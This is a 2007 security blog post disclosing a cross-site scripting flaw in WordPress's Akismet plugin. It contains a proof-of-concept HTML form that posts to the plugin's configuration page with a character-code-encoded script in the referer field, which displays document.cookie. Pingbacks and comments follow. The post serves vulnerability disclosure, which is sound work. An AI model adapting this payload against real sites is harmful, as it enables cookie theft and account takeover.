Wordpress: Akismet XSS Security Flaw (Beware of the Dog!)
May 14th, 2007Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.
<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%2522><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41) )</script>” type=”text”> <input id=”key” name=”key” size=”15″ maxlength=”12″ value=”1337″> <input name=”submit” value=”Update options »” type=”submit”> </form> </body> </html>
Payload will alert(document.cookie)
Just a PoC, I’m plainly too tired to write full code for making a post or stuff, thanks 
UPDATE: The Patch is buggy, Workaround for the wrong “Akismet Link” on your Wordpress Dashboard is avaible here.
Did you Like this Post? Try these ones! :)
Debian Traffic Shaping Script on October 19th, 2007
Updating your Wordpress Plugins: Never ever just overwrite the Plugin Files! on August 13th, 2007
How can I restart the Network Interfaces (eth0) on a Remote Linux Box? on August 11th, 2007
One-time executing JavaScript Payload on March 21st, 2007
Viral Marketing or The Best Newsletter Ever on July 19th, 2007
May 14th, 2007 at 11:07
[…] ★ ★ ★ « previous post: Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) […]
May 14th, 2007 at 11:36
So you mean, that when you log into your own Wordpress installation and edit Akismet’s configuration, you could exploit yourself?
May 14th, 2007 at 11:49
[…] publicado aqui um alerta, divulgado também na lista Full Disclosure sobre uma falha de segurança no Plugin Akismet do Wordpress, a principal ferramenta antispam do mercado e usado por algo em […]
May 15th, 2007 at 09:50
[…] der gestern bekannt gewordenen Sicherheitslücke in Akismet (siehe hier). So soll es sich laut mybeni Blog um ein Cross Site Scripting Sicherheitslücke […]
May 15th, 2007 at 08:33
[…] Referências: http://michaeldaw.org/alerts/alert-140507/ e http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/. […]
May 16th, 2007 at 05:00
[…] Il POC è disponibile a questo indirizzo. […]
May 16th, 2007 at 11:01
[…] Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible. […]
May 16th, 2007 at 11:36
[…] di default nella piattaforma Wordpress è buggato. Per maggiori informazioni ecco advisory e proof od concept che trattano questa vulerabilità. Ma non è ancora finita, pare che anche la patch contenuta […]
July 31st, 2007 at 01:59
[…] Much time has passed since I wrote the last Full Disclosure Publication on this Blog, it was about the security vulnerability in Akismet, a Wordpress antispam plugin. […]